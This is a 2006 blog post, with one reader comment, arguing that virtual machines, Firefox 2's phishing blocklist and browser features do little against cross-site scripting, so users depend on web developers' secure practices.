RETURN $ecure;

Security, Technology and Life

Client-Side protection from XSS

with one comment

Earlier today, on the sla.ckers.org forums, there was mention of virtual machines, anti-phishing toolbars and XSS. This got me to thinking about what users could do to protect themselves from phishing and other XSS-induced troubles. Now, a virtual machine may protect from virus’, but it does nothing for XSS. The cookies for your virtual machines browser are still accessible from within that virtual machine. RSnake mentioned it could prevent Intranet scanning. So, perhaps they could be used in a corporate setting. As I said on the forums…

I would browse inside from a virtual machine, but if it’s a virus, I will reformat. If it’s XSS, my info is gone anyways.

But what about other protection? Firefox 2.0 has an anti-phishing feature. How does this work exactly?

Phishing Protection is turned on by default in Firefox 2, and works by checking the sites that you browse to against a list of known phishing sites. This list is automatically downloaded and regularly updated within Firefox 2 when the Phishing Protection feature is enabled. Since phishing attacks can occur very quickly, there’s also an option to check the sites you browse to against an online service such as Google for more up-to-date protection. This enhanced capability can be turned on via the Security preferences pane.

So, basically it checks the domain against a list of known phishing sites. Great!, but again, does nothing against XSS. A site vulnerable to XSS that you regularly browse will be seen as a non-phishing site due to the domain name. ( site.com/search/<xss> ) but the script will still execute and your information, again, is lost! A great feature, against normal phishing attempts.

 So, perhaps at the browser level? Nope. Not there. The only one even close is Opera. It detects invalid domain characters in the address bar. But they seem to have no interest in expanding the ‘feature’ to hinder XSS. I suggested it to the MozillaZine community, even with help from RSnake and they didn’t exactly jump onto the idea either.

 So, it boils down to this simple fact. For now, we are totally dependant on web developers to be aware of the security risks and use good development practices.

Advertisements

Written by Rodney G

10/11/2006 at 7:31 pm

Posted in Uncategorized

Tagged with

One Response

Subscribe to comments with RSS.

  1. I think browsers are going to need to help with the reflected XSS and CSRF problems. I posted a proposal on how web sites could tell browsers what kind of cross-site linking was expected to the webappsec list at one point, and it turned out that Ivan Ristic had written up some notes in a similar vein (only his ideas go much further…)

    CSL Policy: http://www.webappsec.org/lists/websecurity/archive/2006-06/msg00070.html

    Secure Browsing Mode:
    http://www.webappsec.org/lists/websecurity/archive/2006-06/msg00085.html

    Brian

    10/13/2006 at 2:05 pm


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: